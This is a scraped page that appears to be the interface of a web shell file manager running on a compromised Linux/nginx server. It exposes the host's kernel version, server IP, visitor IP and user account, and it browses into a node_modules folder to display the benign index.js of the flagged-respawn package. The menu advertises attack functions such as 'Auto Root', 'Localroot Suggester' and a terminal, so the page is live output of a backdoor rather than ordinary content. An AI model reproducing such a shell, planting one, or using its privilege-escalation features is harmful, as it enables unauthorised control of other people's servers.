Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.15.28.86
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
flagged-respawn /
Delete
Unzip
Name
Size
Permission
Date
Action
lib
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
LICENSE
1.16
KB
-rw-rw-r--
2022-08-30 11:49
README.md
5.12
KB
-rw-rw-r--
2022-08-30 11:49
index.js
1.24
KB
-rw-rw-r--
2022-08-30 11:49
package.json
1.23
KB
-rw-rw-r--
2022-08-30 11:49
Save
Rename
var reorder = require('./lib/reorder'); var respawn = require('./lib/respawn'); var remover = require('./lib/remover'); var FORBID_RESPAWNING_FLAG = '--no-respawning'; module.exports = function(flags, argv, forcedFlags, execute) { if (!flags) { throw new Error('You must specify flags to respawn with.'); } if (!argv) { throw new Error('You must specify an argv array.'); } if (typeof forcedFlags === 'function') { execute = forcedFlags; forcedFlags = []; } if (typeof forcedFlags === 'string') { forcedFlags = [forcedFlags]; } if (!Array.isArray(forcedFlags)) { forcedFlags = []; } var index = argv.indexOf(FORBID_RESPAWNING_FLAG); if (index >= 0) { argv = argv.slice(0, index).concat(argv.slice(index + 1)); argv = remover(flags, argv); execute(true, process, argv); return; } var proc = process; var reordered = reorder(flags, argv); var ready = JSON.stringify(argv) === JSON.stringify(reordered); if (forcedFlags.length) { reordered = reordered.slice(0, 1) .concat(forcedFlags) .concat(reordered.slice(1)); ready = false; } if (!ready) { reordered.push(FORBID_RESPAWNING_FLAG); proc = respawn(reordered); } execute(ready, proc, reordered); };